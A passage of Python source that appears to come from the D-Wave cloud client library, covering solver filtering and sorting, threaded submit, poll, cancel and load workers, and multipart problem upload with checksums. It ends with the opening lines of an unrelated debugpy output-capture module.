``avg_load``, etc).
Ascending sort order is implied, unless the key string path does
not start with ``-``, in which case descending sort is used.
Note: the sort used for ordering solvers by `key` is **stable**,
meaning that if multiple solvers have the same value for the
key, their relative order is preserved, and effectively they are
in the same order as returned by the API.
Note: solvers with ``None`` for key appear last in the list of
solvers. When providing a key callable, ensure all values returned
are of the same type (particularly in Python 3). For solvers with
undefined key value, return ``None``.
**filters:
See `Filtering forms` and `Operators` below.
Solver filters are defined, similarly to Django QuerySet filters, with
keyword arguments of form `<key1>__...__<keyN>[__<operator>]=<value>`.
Each `<operator>` is a predicate (boolean) function that acts on two
arguments: value of feature `<name>` (described with keys path
`<key1.key2...keyN>`) and the required `<value>`.
Feature `<name>` can be:
1) a derived solver property, available as an identically named
:class:`Solver`'s property (`name`, `qpu`, `hybrid`, `software`,
`online`, `num_active_qubits`, `avg_load`)
2) a solver parameter, available in :obj:`Solver.parameters`
3) a solver property, available in :obj:`Solver.properties`
4) a path describing a property in nested dictionaries
Filtering forms are:
* <derived_property>__<operator> (object <value>)
* <derived_property> (bool)
This form ensures the value of solver's property bound to `derived_property`,
after applying `operator` equals the `value`. The default operator is `eq`.
For example::
>>> client.get_solvers(avg_load__gt=0.5)
but also::
>>> client.get_solvers(online=True)
>>> # identical to:
>>> client.get_solvers(online__eq=True)
* <parameter>__<operator> (object <value>)
* <parameter> (bool)
This form ensures that the solver supports `parameter`. General operator form can
be used but usually does not make sense for parameters, since values are human-readable
descriptions. The default operator is `available`.
Example::
>>> client.get_solvers(flux_biases=True)
>>> # identical to:
>>> client.get_solvers(flux_biases__available=True)
* <property>__<operator> (object <value>)
* <property> (bool)
This form ensures the value of the solver's `property`, after applying `operator`
equals the righthand side `value`. The default operator is `eq`.
Note: if a non-existing parameter/property name/key given, the default operator is `eq`.
Operators are:
* `available` (<name>: str, <value>: bool):
Test availability of <name> feature.
* `eq`, `lt`, `lte`, `gt`, `gte` (<name>: str, <value>: any):
Standard relational operators that compare feature <name> value with <value>.
* `regex` (<name>: str, <value>: str):
Test regular expression matching feature value.
* `covers` (<name>: str, <value>: single value or range expressed as 2-tuple/list):
Test feature <name> value (which should be a *range*) covers a given value or a subrange.
* `within` (<name>: str, <value>: range expressed as 2-tuple/list):
Test feature <name> value (which can be a *single value* or a *range*) is within a given range.
* `in` (<name>: str, <value>: container type):
Test feature <name> value is *in* <value> container.
* `contains` (<name>: str, <value>: any):
Test feature <name> value (container type) *contains* <value>.
* `issubset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a subset of <value>.
* `issuperset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a superset of <value>.
Derived properies are:
* `name` (str): Solver name/id.
* `qpu` (bool): Solver is a QPU?
* `software` (bool): Solver is a software solver?
* `online` (bool, default=True): Is solver online?
* `num_active_qubits` (int): Number of active qubits. Less then or equal to `num_qubits`.
* `avg_load` (float): Solver's average load (similar to Unix load average).
Common solver parameters are:
* `flux_biases`: Should solver accept flux biases?
* `anneal_schedule`: Should solver accept anneal schedule?
Common solver properties are:
* `num_qubits` (int): Number of qubits available.
* `vfyc` (bool): Should solver work on "virtual full-yield chip"?
* `max_anneal_schedule_points` (int): Piecewise linear annealing schedule points.
* `h_range` ([int,int]), j_range ([int,int]): Biases/couplings values range.
* `num_reads_range` ([int,int]): Range of allowed values for `num_reads` parameter.
Returns:
list[Solver]: List of all solvers that satisfy the conditions.
Note:
Client subclasses (e.g. :class:`dwave.cloud.qpu.Client` or
:class:`dwave.cloud.hybrid.Client`) already filter solvers by resource
type, so for `qpu` and `hybrid` filters to have effect, call :meth:`.get_solvers`
on base :class:`~dwave.cloud.client.Client` class.
Examples::
client.get_solvers(
num_qubits__gt=2000, # we need more than 2000 qubits
num_qubits__lt=4000, # ... but fewer than 4000 qubits
num_qubits__within=(2000, 4000), # an alternative to the previous two lines
num_active_qubits=1089, # we want a particular number of active qubits
vfyc=True, # we require a fully yielded Chimera
vfyc__in=[False, None], # inverse of the previous filter
vfyc__available=False, # we want solvers that do not advertize the vfyc property
anneal_schedule=True, # we need support for custom anneal schedule
max_anneal_schedule_points__gte=4, # we need at least 4 points for our anneal schedule
num_reads_range__covers=1000, # our solver must support returning 1000 reads
extended_j_range__covers=[-2, 2], # we need extended J range to contain subrange [-2,2]
couplers__contains=[0, 128], # coupler (edge between) qubits (0,128) must exist
couplers__issuperset=[[0,128], [0,4]],
# two couplers required: (0,128) and (0,4)
qubits__issuperset={0, 4, 215}, # qubits 0, 4 and 215 must exist
supported_problem_types__issubset={'ising', 'qubo'},
# require Ising, QUBO or both to be supported
name='DW_2000Q_5', # full solver name/ID match
name__regex='.*2000.*', # partial/regex-based solver name match
chip_id__regex='DW_.*', # chip ID prefix must be DW_
topology__type__eq="chimera" # topology.type must be chimera
topology__type="chimera" # same as above, `eq` implied even for nested properties
)
"""
def covers_op(prop, val):
"""Does LHS `prop` (range) fully cover RHS `val` (range or item)?"""
# `prop` must be a 2-element list/tuple range.
if not isinstance(prop, (list, tuple)) or not len(prop) == 2:
raise ValueError("2-element list/tuple range required for LHS value")
llo, lhi = min(prop), max(prop)
# `val` can be a single value, or a range (2-list/2-tuple).
if isinstance(val, (list, tuple)) and len(val) == 2:
# val range within prop range?
rlo, rhi = min(val), max(val)
return llo <= rlo and lhi >= rhi
else:
# val item within prop range?
return llo <= val <= lhi
def within_op(prop, val):
"""Is LHS `prop` (range or item) fully covered by RHS `val` (range)?"""
try:
return covers_op(val, prop)
except ValueError:
raise ValueError("2-element list/tuple range required for RHS value")
def _set(iterable):
"""Like set(iterable), but works for lists as items in iterable.
Before constructing a set, lists are converted to tuples.
"""
first = next(iter(iterable))
if isinstance(first, list):
return set(tuple(x) for x in iterable)
return set(iterable)
def with_valid_lhs(op):
@wraps(op)
def _wrapper(prop, val):
if prop is None:
return False
return op(prop, val)
return _wrapper
# available filtering operators
ops = {
'lt': with_valid_lhs(operator.lt),
'lte': with_valid_lhs(operator.le),
'gt': with_valid_lhs(operator.gt),
'gte': with_valid_lhs(operator.ge),
'eq': operator.eq,
'available': lambda prop, val: prop is not None if val else prop is None,
'regex': with_valid_lhs(lambda prop, val: re.match("^{}$".format(val), prop)),
# range operations
'covers': with_valid_lhs(covers_op),
'within': with_valid_lhs(within_op),
# membership tests
'in': lambda prop, val: prop in val,
'contains': with_valid_lhs(lambda prop, val: val in prop),
# set tests
'issubset': with_valid_lhs(lambda prop, val: _set(prop).issubset(_set(val))),
'issuperset': with_valid_lhs(lambda prop, val: _set(prop).issuperset(_set(val))),
}
def predicate(solver, query, val):
# needs to handle kwargs like these:
# key=val
# key__op=val
# key__key=val
# key__key__op=val
# LHS is split on __ in `query`
assert len(query) >= 1
potential_path, potential_op_name = query[:-1], query[-1]
if potential_op_name in ops:
# op is explicit, and potential path is correct
op_name = potential_op_name
else:
# op is implied and depends on property type, path is the whole query
op_name = None
potential_path = query
path = '.'.join(potential_path)
if path in solver.derived_properties:
op = ops[op_name or 'eq']
return op(getattr(solver, path), val)
elif pluck(solver.parameters, path, None) is not None:
op = ops[op_name or 'available']
return op(pluck(solver.parameters, path), val)
elif pluck(solver.properties, path, None) is not None:
op = ops[op_name or 'eq']
return op(pluck(solver.properties, path), val)
else:
op = ops[op_name or 'eq']
return op(None, val)
# param validation
sort_reverse = False
if not order_by:
sort_key = None
elif isinstance(order_by, str):
if order_by[0] == '-':
sort_reverse = True
order_by = order_by[1:]
if not order_by:
sort_key = None
else:
sort_key = lambda solver: pluck(solver, order_by, None)
elif callable(order_by):
sort_key = order_by
else:
raise TypeError("expected string or callable for 'order_by'")
# default filters:
filters.setdefault('online', True)
predicates = []
for lhs, val in filters.items():
query = lhs.split('__')
predicates.append(partial(predicate, query=query, val=val))
logger.debug("Filtering solvers with predicates=%r", predicates)
# optimization for case when exact solver name/id is known:
# we can fetch only that solver
# NOTE: in future, complete feature-based filtering will be on server-side
query = dict(refresh_=refresh)
if 'name' in filters:
query['name'] = filters['name']
if 'name__eq' in filters:
query['name'] = filters['name__eq']
# filter
solvers = self._fetch_solvers(**query)
solvers = [s for s in solvers if all(p(s) for p in predicates)]
# sort: undefined (None) key values go last
if sort_key is not None:
solvers_with_keys = [(sort_key(solver), solver) for solver in solvers]
solvers_with_invalid_keys = [(key, solver) for key, solver in solvers_with_keys if key is None]
solvers_with_valid_keys = [(key, solver) for key, solver in solvers_with_keys if key is not None]
solvers_with_valid_keys.sort(key=operator.itemgetter(0))
solvers = [solver for key, solver in chain(solvers_with_valid_keys, solvers_with_invalid_keys)]
# reverse if necessary (as a separate step from sorting, so it works for invalid keys
# and plain list reverse without sorting)
if sort_reverse:
solvers.reverse()
return solvers
def solvers(self, refresh=False, **filters):
"""Deprecated in favor of :meth:`.get_solvers`.
Scheduled for removal in 0.9.0.
"""
warnings.warn(
"'solvers' is deprecated, and it will be removed "
"in 0.9.0. please convert your code to use 'get_solvers'",
DeprecationWarning)
return self.get_solvers(refresh=refresh, **filters)
def get_solver(self, name=None, refresh=False, **filters):
"""Load the configuration for a single solver.
Makes a blocking web call to `{endpoint}/solvers/remote/{solver_name}/`, where `{endpoint}`
is a URL configured for the client, and returns a :class:`.Solver` instance
that can be used to submit sampling problems to the D-Wave API and retrieve results.
Args:
name (str):
ID of the requested solver. ``None`` returns the default solver.
If default solver is not configured, ``None`` returns the first available
solver in ``Client``'s class (QPU/software/base).
**filters (keyword arguments, optional):
Dictionary of filters over features this solver has to have. For a list of
feature names and values, see: :meth:`~dwave.cloud.client.Client.get_solvers`.
order_by (callable/str/None, default='avg_load'):
Solver sorting key function (or :class:`~dwave.cloud.solver.Solver`
attribute/item dot-separated path). By default, solvers are sorted by average
load. For details, see :meth:`~dwave.cloud.client.Client.get_solvers`.
refresh (bool):
Return solver from cache (if cached with
:meth:`~dwave.cloud.client.Client.get_solvers`), unless set to
``True``.
Returns:
:class:`.Solver`
Examples:
This example creates two solvers for a client instantiated from
a local system's auto-detected default configuration file, which configures
a connection to a D-Wave resource that provides two solvers. The first
uses the default solver, the second explicitly selects another solver.
>>> from dwave.cloud import Client
>>> client = Client.from_config() # doctest: +SKIP
>>> client.get_solvers() # doctest: +SKIP
[Solver(id='2000Q_ONLINE_SOLVER1'), Solver(id='2000Q_ONLINE_SOLVER2')]
>>> solver1 = client.get_solver() # doctest: +SKIP
>>> solver2 = client.get_solver(name='2000Q_ONLINE_SOLVER2') # doctest: +SKIP
>>> solver1.id # doctest: +SKIP
'2000Q_ONLINE_SOLVER1'
>>> solver2.id # doctest: +SKIP
'2000Q_ONLINE_SOLVER2'
>>> # code that uses client
>>> client.close() # doctest: +SKIP
"""
logger.info("Requested a solver that best matches feature filters=%r", filters)
# backward compatibility: name as the first feature
if name is not None:
filters.setdefault('name', name)
# allow `order_by` to be specified as part of solver features dict
order_by = filters.pop('order_by', None)
# in absence of other filters, config/env solver filters/name are used
if not filters and self.default_solver:
filters = copy.deepcopy(self.default_solver)
# allow `order_by` from default config/init override
if order_by is None:
order_by = filters.pop('order_by', 'avg_load')
else:
filters.pop('order_by', None)
# get the first solver that satisfies all filters
try:
logger.info("Fetching solvers according to filters=%r, order_by=%r",
filters, order_by)
solvers = self.get_solvers(refresh=refresh, order_by=order_by, **filters)
logger.info("Filtered solvers=%r", solvers)
return solvers[0]
except IndexError:
raise SolverNotFoundError("Solver with the requested features not available")
def _submit(self, body, future):
"""Enqueue a problem for submission to the server.
This method is thread safe.
"""
self._submission_queue.put(self._submit.Message(body, future))
_submit.Message = namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
"""Pull problems from the submission queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
def task_done():
self._submission_queue.task_done()
def filter_ready(item):
"""Pass-through ready (encoded) problems, re-enqueue ones for which
the encoding is in progress, and fail the ones for which encoding
failed.
"""
# body is a `concurrent.futures.Future`, so make sure
# it's ready for submitting
if item.body.done():
exc = item.body.exception()
if exc:
# encoding failed, submit should fail as well
logger.info("Problem encoding prior to submit "
"failed with: %r", exc)
item.future._set_exception(exc)
task_done()
else:
# problem ready for submit
return [item]
else:
# body not ready, return the item to queue
self._submission_queue.put(item)
task_done()
return []
session = self.create_session()
try:
while True:
# Pull as many problems as we can, block on the first one,
# but once we have one problem, switch to non-blocking then
# submit without blocking again.
# `None` task is used to signal thread termination
item = self._submission_queue.get()
if item is None:
task_done()
break
ready_problems = filter_ready(item)
while len(ready_problems) < self._SUBMIT_BATCH_SIZE:
try:
item = self._submission_queue.get_nowait()
except queue.Empty:
break
ready_problems.extend(filter_ready(item))
if not ready_problems:
continue
# Submit the problems
logger.debug("Submitting %d problems", len(ready_problems))
try:
body = '[' + ','.join(msg.body.result() for msg in ready_problems) + ']'
logger.debug('Size of POST body = %d', len(body))
message = Client._sapi_request(session.post, 'problems/', body)
logger.debug("Finished submitting %d problems", len(ready_problems))
except Exception as exc:
logger.debug("Submit failed for %d problems with %r",
len(ready_problems), exc)
for msg in ready_problems:
msg.future._set_exception(exc)
task_done()
continue
# Pass on the information
for submission, msg in zip_longest(ready_problems, message):
try:
self._handle_problem_status(msg, submission.future)
except Exception as exc:
submission.future._set_exception(exc)
finally:
task_done()
except BaseException as err:
logger.exception(err)
finally:
session.close()
def _handle_problem_status(self, message, future):
"""Handle the results of a problem submission or results request.
This method checks the status of the problem and puts it in the correct
queue.
Args:
message (dict):
Update message from the SAPI server wrt. this problem.
future (:class:`dwave.cloud.computation.Future`:
future corresponding to the problem
Note:
This method is always run inside of a daemon thread.
"""
try:
logger.trace("Handling response: %r", message)
if not isinstance(message, dict):
raise InvalidAPIResponseError("Unexpected format of problem description response")
logger.debug("Handling response for %s with status %s",
message.get('id'), message.get('status'))
# Handle errors in batch mode
if 'error_code' in message and 'error_msg' in message:
logger.debug("Error response received: %r", message)
raise SolverFailureError(message['error_msg'])
if 'status' not in message:
raise InvalidAPIResponseError("'status' missing in problem description response")
if 'id' not in message:
raise InvalidAPIResponseError("'id' missing in problem description response")
future.id = message['id']
future.label = message.get('label')
future.remote_status = status = message['status']
# The future may not have the ID set yet
with future._single_cancel_lock:
# This handles the case where cancel has been called on a future
# before that future received the problem id
if future._cancel_requested:
if not future._cancel_sent and status == self.STATUS_PENDING:
# The problem has been canceled but the status says its still in queue
# try to cancel it
self._cancel(message['id'], future)
# If a cancel request could meaningfully be sent it has been now
future._cancel_sent = True
if not future.time_received and message.get('submitted_on'):
future.time_received = parse_datetime(message['submitted_on'])
if not future.time_solved and message.get('solved_on'):
future.time_solved = parse_datetime(message['solved_on'])
if status == self.STATUS_COMPLETE:
# TODO: find a better way to differentiate between
# `completed-on-submit` and `completed-on-poll`.
# Loading should happen only once, not every time when response
# doesn't contain 'answer'.
# If the message is complete, forward it to the future object
if 'answer' in message:
# If the future does not know which solver it's associated
# with, we get it from the info provided from the server.
# An alternative to making this call here would be to pass
# self in with the message
if future.solver is None:
future.solver = self.get_solver(name=message['solver'])
future._set_message(message)
# If the problem is complete, but we don't have the result data
# put the problem in the queue for loading results.
else:
self._load(future)
elif status in self.ANY_STATUS_ONGOING:
# If the response is pending add it to the queue.
self._poll(future)
elif status == self.STATUS_CANCELLED:
# If canceled return error
raise CanceledFutureError()
else:
# Return an error to the future object
errmsg = message.get('error_message', 'An unknown error has occurred.')
if 'solver is offline' in errmsg.lower():
raise SolverOfflineError(errmsg)
else:
raise SolverFailureError(errmsg)
except Exception as exc:
# If there were any unhandled errors we need to release the
# lock in the future, otherwise deadlock occurs.
future._set_exception(exc)
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
"""Pull ids from the cancel queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
while True:
# Pull as many problems as we can, block when none are available.
# `None` task is used to signal thread termination
item = self._cancel_queue.get()
if item is None:
break
item_list = [item]
while True:
try:
item_list.append(self._cancel_queue.get_nowait())
except queue.Empty:
break
# Submit the problems, attach the ids as a json list in the
# body of the delete query.
try:
ids = [item[0] for item in item_list]
Client._sapi_request(session.delete, 'problems/', json=ids)
except Exception as exc:
for _, future in item_list:
if future is not None:
future._set_exception(exc)
# Mark all the ids as processed regardless of success or failure.
for _ in item_list:
self._cancel_queue.task_done()
except Exception as err:
logger.exception(err)
finally:
session.close()
def _poll(self, future):
"""Enqueue a problem to poll the server for status."""
if future._poll_backoff is None:
# on first poll, start with minimal back-off
future._poll_backoff = self.poll_backoff_min
else:
# on subsequent polls, do exponential back-off, clipped to a range
future._poll_backoff = \
max(self.poll_backoff_min,
min(future._poll_backoff * 2, self.poll_backoff_max))
# for poll priority we use timestamp of next scheduled poll
at = time.time() + future._poll_backoff
now = utcnow()
future_age = (now - future.time_created).total_seconds()
logger.debug("Polling scheduled at %.2f with %.2f sec new back-off for: %s (future's age: %.2f sec)",
at, future._poll_backoff, future.id, future_age)
# don't enqueue for next poll if polling_timeout is exceeded by then
future_age_on_next_poll = future_age + (at - datetime_to_timestamp(now))
if self.polling_timeout is not None and future_age_on_next_poll > self.polling_timeout:
logger.debug("Polling timeout exceeded before next poll: %.2f sec > %.2f sec, aborting polling!",
future_age_on_next_poll, self.polling_timeout)
raise PollingTimeout
self._poll_queue.put((at, future))
def _do_poll_problems(self):
"""Poll the server for the status of a set of problems.
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
# grouped futures (all scheduled within _POLL_GROUP_TIMEFRAME)
frame_futures = {}
def task_done():
self._poll_queue.task_done()
def add(future):
# add future to query frame_futures
# returns: worker lives on?
# `None` task signifies thread termination
if future is None:
task_done()
return False
if future.id not in frame_futures and not future.done():
frame_futures[future.id] = future
else:
task_done()
return True
while True:
frame_futures.clear()
# blocking add first scheduled
frame_earliest, future = self._poll_queue.get()
if not add(future):
return
# try grouping if scheduled within grouping timeframe
while len(frame_futures) < self._STATUS_QUERY_SIZE:
try:
task = self._poll_queue.get_nowait()
except queue.Empty:
break
at, future = task
if at - frame_earliest <= self._POLL_GROUP_TIMEFRAME:
if not add(future):
return
else:
task_done()
self._poll_queue.put(task)
break
# build a query string with ids of all futures in this frame
ids = [future.id for future in frame_futures.values()]
logger.debug("Polling for status of futures: %s", ids)
query_string = 'problems/?id=' + ','.join(ids)
# if futures were cancelled while `add`ing, skip empty frame
if not ids:
continue
# wait until `frame_earliest` before polling
delay = frame_earliest - time.time()
if delay > 0:
logger.debug("Pausing polling %.2f sec for futures: %s", delay, ids)
time.sleep(delay)
else:
logger.trace("Skipping non-positive delay of %.2f sec", delay)
# execute and handle the polling request
try:
logger.trace("Executing poll API request")
try:
statuses = Client._sapi_request(session.get, query_string)
except SAPIError as exc:
# assume 5xx errors are transient, and don't abort polling
if 500 <= exc.error_code < 600:
logger.warning(
"Received an internal server error response on "
"problem status polling request (%s). Assuming "
"error is transient, and resuming polling.",
exc.error_code)
# add all futures in this frame back to the polling queue
# XXX: logic split between `_handle_problem_status` and here
for future in frame_futures.values():
self._poll(future)
else:
raise
else:
# handle a successful request
for status in statuses:
self._handle_problem_status(status, frame_futures[status['id']])
except Exception as exc:
for id_ in frame_futures.keys():
frame_futures[id_]._set_exception(exc)
for id_ in frame_futures.keys():
task_done()
except Exception as err:
logger.exception(err)
finally:
session.close()
def _load(self, future):
"""Enqueue a problem to download results from the server.
Args:
future (:class:`~dwave.cloud.computation.Future`):
Future object corresponding to the remote computation.
This method is thread-safe.
"""
self._load_queue.put(future)
def _do_load_results(self):
"""Submit a query asking for the results for a particular problem.
To request the results of a problem: ``GET /problems/{problem_id}/``
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
while True:
# Select a problem
future = self._load_queue.get()
# `None` task signifies thread termination
if future is None:
break
logger.debug("Loading results of: %s", future.id)
# Submit the query
query_string = 'problems/{}/'.format(future.id)
try:
message = Client._sapi_request(session.get, query_string)
except Exception as exc:
logger.debug("Answer load request failed with %r", exc)
future._set_exception(exc)
self._load_queue.task_done()
continue
# Dispatch the results, mark the task complete
self._handle_problem_status(message, future)
self._load_queue.task_done()
except Exception as err:
logger.error('Load result error: ' + str(err))
finally:
session.close()
def upload_problem_encoded(self, problem, problem_id=None):
"""Initiate multipart problem upload, returning the Problem ID in a
:class:`~concurrent.futures.Future`.
Args:
problem (bytes-like/file-like):
Encoded problem data to upload.
problem_id (str, optional):
Problem ID. If provided, problem will be re-uploaded. Previously
uploaded parts, with a matching checksum, are skipped.
Returns:
:class:`concurrent.futures.Future`[str]:
Problem ID in a Future. Problem ID can be used to submit
problems by reference.
Note:
For a higher-level interface, use upload/submit solver methods.
"""
return self._upload_problem_executor.submit(
self._upload_problem_worker, problem=problem, problem_id=problem_id)
@staticmethod
def _sapi_request(meth, *args, **kwargs):
"""Execute an HTTP request defined with the ``meth`` callable and
parse the response and interpret errors in compliance with SAPI REST
interface.
Note:
For internal use only.
Args:
meth (callable):
Callable object to be called with args and kwargs supplied, with
expected behavior consistent with one of ``requests.Session()``
request methods.
*args, **kwargs (list, dict):
Arguments to the ``meth`` callable.
Returns:
dict: JSON decoded body.
Raises:
A :class:`~dwave.cloud.exceptions.SAPIError` subclass, or
:class:`~dwave.cloud.exceptions.RequestTimeout`.
"""
caller = inspect.stack()[1].function
verb = meth.__name__
logger.trace("[%s] request: session.%s(*%r, **%r)", caller, verb, args, kwargs)
# execute request
try:
response = meth(*args, **kwargs)
except Exception as exc:
if is_caused_by(exc, (requests.exceptions.Timeout,
urllib3.exceptions.TimeoutError)):
raise RequestTimeout
else:
raise
# parse response
logger.trace("[%s] response: (code=%r, body=%r)",
caller, response.status_code, response.text)
# workaround for charset_normalizer episode in requests>=2.26.0,
# where decoding of an empty json object '{}' fails.
# see: https://github.com/psf/requests/issues/5871,
# https://github.com/dwavesystems/dwave-cloud-client/pull/471, and
# https://github.com/dwavesystems/dwave-cloud-client/pull/476.
response.encoding = 'utf-8'
# NOTE: the expected behavior is for SAPI to return JSON error on
# failure. However, that is currently not the case. We need to work
# around this until it's fixed.
# no error -> body is json
# error -> body can be json or plain text error message
if response.ok:
try:
return response.json()
except:
raise InvalidAPIResponseError("JSON response expected")
else:
if response.status_code == 401:
raise SolverAuthenticationError(error_code=401)
try:
msg = response.json()
error_msg = msg['error_msg']
error_code = msg['error_code']
except:
error_msg = response.text
error_code = response.status_code
# NOTE: for backwards compat only. Change to: SAPIError
raise SolverError(error_msg=error_msg, error_code=error_code)
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _initiate_multipart_upload(session, size):
"""Sync http request using `session`."""
logger.debug("Initiating problem multipart upload (size=%r)", size)
path = 'bqm/multipart'
body = dict(size=size)
msg = Client._sapi_request(session.post, path, json=body)
try:
problem_id = msg['id']
except KeyError:
raise InvalidAPIResponseError("problem ID missing")
logger.debug("Multipart upload initiated (problem_id=%r)", problem_id)
return problem_id
@staticmethod
def _digest(data):
# data: bytes => md5(data): bytes
return hashlib.md5(data).digest()
@staticmethod
def _checksum_b64(digest):
# digest: bytes => base64(digest): str
return base64.b64encode(digest).decode('ascii')
@staticmethod
def _checksum_hex(digest):
# digest: bytes => hex(digest): str
return codecs.encode(digest, 'hex').decode('ascii')
@staticmethod
def _combined_checksum(checksums):
# TODO: drop this requirement server-side
# checksums: Dict[int, str] => hex(md5(cat(digests))): str
combined = ''.join(h for _, h in sorted(checksums.items()))
digest = codecs.decode(combined, 'hex')
return Client._checksum_hex(Client._digest(digest))
@staticmethod
@retried(_UPLOAD_PART_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _upload_multipart_part(session, problem_id, part_id, part_generator,
uploaded_part_checksum=None):
"""Upload one problem part. Sync http request.
Args:
session (:class:`requests.Session`):
Session used for all API requests.
problem_id (str):
Problem id.
part_id (int):
Part number/id.
part_generator (generator of :class:`io.BufferedIOBase`/binary-stream-like):
Callable that produces problem part data container that supports
`read` and `seek` operations.
uploaded_part_checksum (str/None):
Checksum of previously uploaded part. Optional, but if specified
checksum is verified, and part is uploaded only if checksums
don't match.
Returns:
Hex digest of part data MD5 checksum.
"""
logger.debug("Uploading part_id=%r of problem_id=%r", part_id, problem_id)
# generate the mutable part stream from immutable stream generator
part_stream = part_generator()
# TODO: work-around to get a checksum of a binary stream (avoid 2x read)
data = part_stream.read()
digest = Client._digest(data)
b64digest = Client._checksum_b64(digest)
hexdigest = Client._checksum_hex(digest)
del data
if uploaded_part_checksum is not None:
if hexdigest == uploaded_part_checksum:
logger.debug("Uploaded part checksum matches. "
"Skipping upload for part_id=%r.", part_id)
return hexdigest
else:
logger.debug("Uploaded part checksum does not match. "
"Re-uploading part_id=%r.", part_id)
# rewind the stream after read
part_stream.seek(0)
path = 'bqm/multipart/{problem_id}/part/{part_id}'.format(
problem_id=problem_id, part_id=part_id)
headers = {
'Content-MD5': b64digest,
'Content-Type': 'application/octet-stream',
}
msg = Client._sapi_request(session.put, path, data=part_stream, headers=headers)
logger.debug("Uploaded part_id=%r of problem_id=%r", part_id, problem_id)
return hexdigest
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _get_multipart_upload_status(session, problem_id):
logger.debug("Checking upload status of problem_id=%r", problem_id)
path = 'bqm/multipart/{problem_id}/status'.format(problem_id=problem_id)
msg = Client._sapi_request(session.get, path)
try:
msg['status']
msg['parts']
except KeyError:
raise InvalidAPIResponseError("'status' and/or 'parts' missing")
logger.debug("Got upload status=%r for problem_id=%r",
msg['status'], problem_id)
return msg
@staticmethod
def _failsafe_get_multipart_upload_status(session, problem_id):
try:
return Client._get_multipart_upload_status(session, problem_id)
except Exception as e:
logger.debug("Upload status check failed with %r", e)
return {"status": "UNDEFINED", "parts": []}
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _combine_uploaded_parts(session, problem_id, checksum):
logger.debug("Combining uploaded parts of problem_id=%r", problem_id)
path = 'bqm/multipart/{problem_id}/combine'.format(problem_id=problem_id)
body = dict(checksum=checksum)
msg = Client._sapi_request(session.post, path, json=body)
logger.debug("Issued a combine command for problem_id=%r", problem_id)
@staticmethod
def _uploaded_parts_from_problem_status(problem_status):
uploaded_parts = {}
if problem_status.get('status') == 'UPLOAD_IN_PROGRESS':
for part in problem_status.get('parts', ()):
part_no = part.get('part_number')
checksum = part.get('checksum', '').strip('"') # fix double-quoting bug
uploaded_parts[part_no] = checksum
return uploaded_parts
def _upload_part_worker(self, problem_id, part_no, chunk_generator,
uploaded_part_checksum=None):
with self.create_session() as session:
part_checksum = self._upload_multipart_part(
session, problem_id, part_id=part_no, part_generator=chunk_generator,
uploaded_part_checksum=uploaded_part_checksum)
return part_no, part_checksum
def _upload_problem_worker(self, problem, problem_id=None):
"""Upload a problem to SAPI using multipart upload interface.
Args:
problem (bytes/str/file-like):
Problem description.
problem_id (str, optional):
Problem ID under which to upload the problem. If omitted, a new
problem is created.
"""
# in python 3.7+ we could create the session once, on thread init,
# via executor initializer
with self.create_session() as session:
chunks = ChunkedData(problem, chunk_size=self._UPLOAD_PART_SIZE_BYTES)
size = chunks.total_size
if problem_id is None:
try:
problem_id = self._initiate_multipart_upload(session, size)
except Exception as e:
errmsg = ("Multipart upload initialization failed "
"with {!r}.".format(e))
logger.error(errmsg)
raise ProblemUploadError(errmsg) from e
# check problem status, so we only upload parts missing or invalid
problem_status = \
self._failsafe_get_multipart_upload_status(session, problem_id)
if problem_status.get('status') == 'UPLOAD_COMPLETED':
logger.debug("Problem already uploaded.")
return problem_id
uploaded_parts = \
self._uploaded_parts_from_problem_status(problem_status)
# enqueue all parts, worker skips if checksum matches
parts = {}
for chunk_no, chunk_generator in enumerate(chunks.generators()):
part_no = chunk_no + 1
part_future = self._upload_part_executor.submit(
self._upload_part_worker,
problem_id, part_no, chunk_generator,
uploaded_part_checksum=uploaded_parts.get(part_no))
parts[part_no] = part_future
# wait for parts to upload/fail
concurrent.futures.wait(parts.values())
# verify all parts uploaded without error
for part_no, part_future in parts.items():
try:
part_future.result()
except Exception as e:
errmsg = ("Multipart upload of problem_id={!r} failed for "
"part_no={!r} with {!r}.".format(problem_id, part_no, e))
logger.error(errmsg)
raise ProblemUploadError(errmsg) from e
# verify all parts uploaded via status call
# (check remote checksum matches the local one)
final_problem_status = \
self._failsafe_get_multipart_upload_status(session, problem_id)
final_uploaded_parts = \
self._uploaded_parts_from_problem_status(final_problem_status)
if len(final_uploaded_parts) != len(parts):
errmsg = "Multipart upload unexpectedly failed for some parts."
logger.error(errmsg)
logger.debug("problem_id=%r, expected_parts=%r, uploaded_parts=%r",
problem_id, parts.keys(), final_uploaded_parts.keys())
raise ProblemUploadError(errmsg)
for part_no, part_future in parts.items():
_, part_checksum = part_future.result()
remote_checksum = final_uploaded_parts[part_no]
if part_checksum != remote_checksum:
errmsg = ("Checksum mismatch for part_no={!r} "
"(local {!r} != remote {!r})".format(
part_no, part_checksum, remote_checksum))
logger.error(errmsg)
raise ProblemUploadError(errmsg)
# send parts combine request
combine_checksum = Client._combined_checksum(final_uploaded_parts)
try:
self._combine_uploaded_parts(session, problem_id, combine_checksum)
except Exception as e:
errmsg = ("Multipart upload of problem_id={!r} failed on parts "
"combine with {!r}".format(problem_id, e))
logger.error(errmsg)
raise ProblemUploadError(errmsg) from e
return problem_id
|
output.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import codecs
import os
import sys
import threading
from debugpy import launcher
from debugpy.common import log
class CaptureOutput(object):
"""Captures output from the specified file descriptor, and tees it into another
file descriptor while generating DAP "output" events for it.
"""
instances = {}
"""Keys are output categories, values are CaptureOutput instances."""
